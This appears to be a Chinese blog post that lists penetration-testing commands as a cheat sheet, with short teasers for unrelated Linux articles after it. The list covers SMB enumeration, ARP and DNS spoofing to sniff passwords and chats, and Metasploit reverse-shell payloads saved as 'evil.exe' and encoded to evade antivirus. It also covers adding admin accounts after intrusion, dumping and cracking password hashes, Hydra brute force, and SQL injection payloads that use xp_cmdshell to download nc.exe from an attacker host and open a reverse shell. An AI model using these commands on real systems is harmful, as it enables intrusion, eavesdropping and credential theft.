代码编织梦想

whois 域名/ip 查看域名的详细信息。
ping 域名/ip 测试本机到远端主机是否联通。
dig 域名/ip 查看域名解析的详细信息。
host -l 域名 dns服务器 传输zone。
扫描
nmap:
-sS 半开扫描TCP和SYN扫描。
-sT 完全TCP连接扫描。
-sU UDP扫描
-PS syn包探测(防火墙探测)
-PA ack包探测(防火墙探测)
-PN 不ping。
-n 不dns解析。
-A -O和-sV。
-O 操作系统识别。
-sV 服务版本信息(banner)
-p 端口扫描。
-T 设置时间级别(0-5)
-iL 导入扫描结果。
-oG 输出扫描结果。

操作系统识别:
p0f -i eth0 -U -p 开启混杂模式。
xprobe2 ip|域名 检测os。

banner获取:
nc ip port 检测端口是否打开。
telnet ip port 检测端口是否打开。
wget ip 下载主页。
cat index.html | more 显示主页代码。
q 退出。

windows枚举
nmap -sS -p 139,445 ip 扫描windows。
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP 检测netbios。
smbgetserverinfo -i targetIP 扫描name,os,组。
smbdumpusers -i targetIP 列出用户。
smbclient -L //targetIP 列出共享。

使用windows:
net use \ip\ipc$ “” /u:"" 开启空会话。
net view \ip 显示共享信息。
smbclient:
smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U “” 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户连接。

rpcclient:
rpcclient targetIP -U “”打开一个空会话。
netshareenum 枚举共享。
enumdomusers 枚举用户。
lsaenumsid 枚举域SID。
queryuser RID 查询用户信息。
createdomuser 创建用户访问。

ARP欺骗:
ettercap:
nano /usr/local/etc/etter.conf配置文件
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡
Hosts > Scan for hosts (do this two times)扫描网段的主机
Hosts > Hosts list 显示主机列表
Select the default gateway > Add to Target 1 添加主机
Select the target > Add to Target 2 添加主机
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击
Start > Start sniffing 开始攻击
dsniff -i eth0 监听网卡窃听登录用户密码
urlsnarf -i eth0 嗅探http请求
msgsnarf -i eth0 嗅探聊天软件的聊天内容
driftnet -i eth0 网络管理嗅探图片,音频。

dns欺骗:
nano /usr/local/share/ettercap/etter.dns编辑配置文件
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
Start > Start sniffing 开始攻击

Exploits漏洞利用:
cd /pentest/exploits/exploit-db 进入目录
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
cat exploit | grep "#include"检查运行环境
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d “:” -f1 | sort -u只保留可以在linux下运行的代码

Metasploit:
svn update 升级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show 显示选项
search 搜索名字
use 使用漏洞
show options 显示选项
set 设置选项
show payloads 显示装置
set PAYLOAD 设置装置
show options 显示选项
set 设置选项
show targets 显示目标(os版本)
set TARGET 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i 选择会话
sessions -k 结束会话
z 把会话放到后台
c 结束会话
jobs 列出漏洞运行工作
jobs -K 结束一个漏洞运行工作
show auxiliary 显示辅助模块
use 使用辅助模块
set 设置选项
run 运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
Target behind firewall: reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口攻击流程:
./msfcli | grep -i
./msfcli S
./msfcli = PAYLOAD= E
做木马后门等:
./msfpayload <variable=value>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码处理就是做免杀:
./msfencode <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00’ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00’ -e PexFnstenvMor -t c

入侵后在windows下添加管理员用户:
hostname 查看主机名
net users 查看用户
net user 用户 密码 /add 添加用户
net localgroup 查看工作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理员组

TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载

密码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示个数(30多万个)
暴力:
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
hydra -P words -v targetIP snmp 攻击snmp
攻击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r www.target.com --accept=pdf 下载pdf文档
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\windows\system32\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \127.0.0.1
john破解密码:
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
彩虹表:
rcrack *.rt -f hash.txt

本地修改密码:
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1 挂载c盘
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件
直接修改sam文件:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot

SQL 注入
nmap -sS -p 1521 targetIP 扫描oracle
nmap -sS -p T:1433,U:1434 targetIP 扫描mssql
’ or 1=1–验证旁路
列举表名:
’ having 1=1–
’ group by table having 1=1–
’ group by table, table2 having 1=1–
’ group by table, table2, table3 having 1=1–
列举列类型:
union select sum(column) from table –
union select sum(column2) from table –
添加数据:
’ ; insert into table values(‘value’,‘value2’,‘value3’)–
MSSQL存储程序:
输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。
’ ; exec sp_makewebtask “c:\Inetpub\wwwroot\test.html”, “select * from table” ; – www.target.com/test.html
运行ipconfig在浏览器查看信息。
’ or 1=1; exec master…xp_cmdshell ’ “ipconfig” > c:\Inetpub\wwwroot\test.txt’ ;-- www.target.com/test.txt
上传后门。
’ or 1=1; exec master…xp_cmdshell ’ "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; –
攻击者: nc -lvp 53

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_49071539/article/details/110540937

Linux系统安全基本措施及应用(关于账户安全以及sudo权限,安全认证等)-爱代码爱编程

文章目录 Linux系统安全及应用一、账号安全基本措施【一】系统账号清理小实验【二】密码安全控制小实验【三】命令历史限制小实验【四】终端自动注销二、使用su命令切换用户用途及用法密码验证限制使用su命令的用户查看su操作记录三、Linux中的PAM安全认证su命令的安全隐患PAM(Pluggable Authentication Modules)可

Linux引导过程与服务控制-爱代码爱编程

Linux引导过程与服务控制 一、Linux操作系统引导过程1、开机自检2、MBR 引导3、MBR菜单4、加载Linux内核5、inint 进程初始化二、系统初始化进程1、init进程2、Systemd3、Systemd单元类型4、运行级别所对应的Systemd目标三、排除启动类故障1、修复MBR扇区故障2、模拟MBR扇区故障4、修复GRUB引导故

Linux与网络相关的操作-爱代码爱编程

网络操作 · 主机名配置 查看主机名称:hostname修改主机名称(重启后失效):hostname newName Tips:进入 /etc/sysconfig/network 目录后修改并保存其配置参数可永久记录修改结果。网络操作 · IP地址配置 重启操作系统的网络服务:service network restart查看IP地址:ifconfig

Linux线程-爱代码爱编程

线程: 一个进程在同一时刻制作一件事,有了多格控制线程之后,在程序设计时就可以把进程设计成同一时刻做不止一件事,每个线程各自处理独立的任务。 进程有独立的地址空间,一个进程崩溃后在保护模式下不会对其他进程产生影响,而线程只是一个进程中的不同执行路径,线程有自己的堆栈和局部变量,但是线程没有单独的地址空间,一个线程死掉就等于整个进程死掉,所以多进程的程序比多

nc netcat 命令简介-爱代码爱编程

以下内容转载自 原文 https://www.oschina.net/translate/linux-netcat-command netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立

教你如何在linux中创建个人用户主页-爱代码爱编程

1、在配置文件中开启个人用户主页的功能 2、创建个人主页+在该用户中创建保存该用户主页的数据目录文件+对该目录文件进行授权 3、重新启动httpd服务 4、访问个人主页 5、出现无法访问,需要过滤相关的安全策略 6、修改selinux的策略规则,使之永久生效并立即生效 实验: 1、在配置文件中开启个人用户主页的功能 vim /etc/httpd/conf

VulnHub-TR0LL: 2-靶机渗透学习-爱代码爱编程

靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度:中级(CTF) 靶机描述:Tr0ll系列VM中的下一台计算机,这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且毫无疑问,巨魔仍然存在! 难度是从初学者到中级。 目标:得到root权限&找到proof.txt 作者:嗯嗯呐

kali2019之后版本shell脚本自启动-爱代码爱编程

kali2019之后版本脚本自启动 @Time : 2020年12月2日, 0002 14:08@Author : 862897316@qq.com@Software: PyCharm 开始编写 脚本自启动 印象中,kali系统中是存在rc.local文件的,但是使用虚拟机安装的系统里面,并没有找到rc.loacl文件 因此设置脚本自启动方式就

Linux 基础命令,永久更新-爱代码爱编程

移动: ctrl+alt ------------------------------------------光标移除虚拟机 cd /目录/----------------------------------------进入指定目录 cd … --------------------------------------------退出到上层目录 cd -

windows远程linux桌面kali桌面-爱代码爱编程

Linux端 保证Linux是有桌面界面的版本 安装xrdp,xrdp在 EPEL仓库可以使用,所以配置 EPEL仓库: sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm 安装插件 yum -y install xrdp

kali 升级msf到msf6-爱代码爱编程

安装kali过程注意不要使用网络镜像,以及将grub安装至硬盘时选择/dev/sda,其它一律默认即可 安装好kali后,启动msf,发现版本很旧,没有近期的cve,打算升级一下。 但是输入apt-get update;apt-get install metasploit-framework,告诉我msf已经是最新,无须更新。 原因是安装kali时没

客户机操作系统已禁用CPU。请关闭或重置虚拟机-小白都能看懂系列-爱代码爱编程

客户机操作系统已禁用CPU。请关闭或重置虚拟机 出现下面警告!!!不要困扰,如果你尝试了全网包括CSDN在内的诸如设置cpu虚拟化或者其他种种方法都不对,也许你该升级你的vmware了,我原来的是12,更新后是16了,一下子问题就解决了,不用担心它会对你原来的虚拟机怎么样,它删除了你原来的vmware,将所有数据迁移到新的vmware,包括你的虚拟机。